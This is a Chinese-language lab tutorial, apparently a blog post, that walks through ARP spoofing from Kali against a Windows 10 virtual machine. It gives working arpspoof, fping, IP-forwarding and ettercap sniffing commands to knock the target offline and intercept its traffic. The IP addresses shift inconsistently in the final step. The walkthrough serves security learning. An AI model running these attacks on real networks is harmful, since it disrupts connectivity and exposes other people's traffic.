在局域网内进行ARP欺骗攻击(Kali)

目的

使用kali系统进行ARP欺骗,导致局域网目标设备无法上网

准备环境

虚拟机

系统IP地址MAC地址
攻击者Kali192.168.6.12900-0c-29-d3-14-8b
被攻击者(靶机)Windows192.168.6.13700-50-56-eb-3a-33

实验步骤

1、安装arpspoof

命令:apt-get install dsniff

2、扫描IP

用arpspoof工具,查看同网段下的所有活动IP,确认被攻击的IP地址

命令:fping –asg 局域网范围

fping –asg 192.168.6.0/24

下图看到,同网段有四个活动IP

3、实施断网攻击

命令:arpspoof –i 网卡 –t 靶机IP地址 网关

-i 指定网卡

-t 持续不断攻击

我的命令:arpspoof –i eth0 –t 192.168.6.137 192.168.6.1

Kali中持续不断地发送arp应答包,进行ARP欺骗

4、查看Win10靶机网络状态

Windows10(靶机)

被攻击机ping不通显示断网,上不了网

被攻击的状态

 5、查看Win10的MAC地址

在windows10虚拟机(靶机)中查看局域网中的IP-MAC对照表

 

发现Win10192.168.6.1(网关)的MAC地址已经变成了Kali eth0网卡的MAC地址

 6、停止攻击

Kali终端按下Ctrl+cok

再次在win10中查看MAC地址,发现网关的MAC已经变回来了,因为ARP欺骗停止了,也证明了我们刚才的ARP欺骗成功了!

7、开启IP转发功能

开启IP转发功能,linux因为系统安全考虑,是不支持IP转发的,其配置文件写在/proc/sys/net/ipv4的ip_forward中。默认为0,接下来修改为1

 

命令:echo 1 > /proc/sys/net/ipv4/ip_forward

然后输入命令查看:cat /proc/sys/net/ipv4/ip_forward 看看有没有改。

 

 8、ettercap嗅探

 输入命令:arpspoof -i eth0 -t 192.168.220.153 192.168.220.2 发起攻击

欺骗成功,接下来我们在kali攻击机 再打开一个终端,使用ettercap嗅探

输入命令:ettercap -Tq -i eth0

嗅探成功!!!

Kali里有一个ettercap嗅探工具,后面再来用一下ettercap嗅探工具,再详细讲。

本文只做实验教程,请勿做他用

  • 4
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值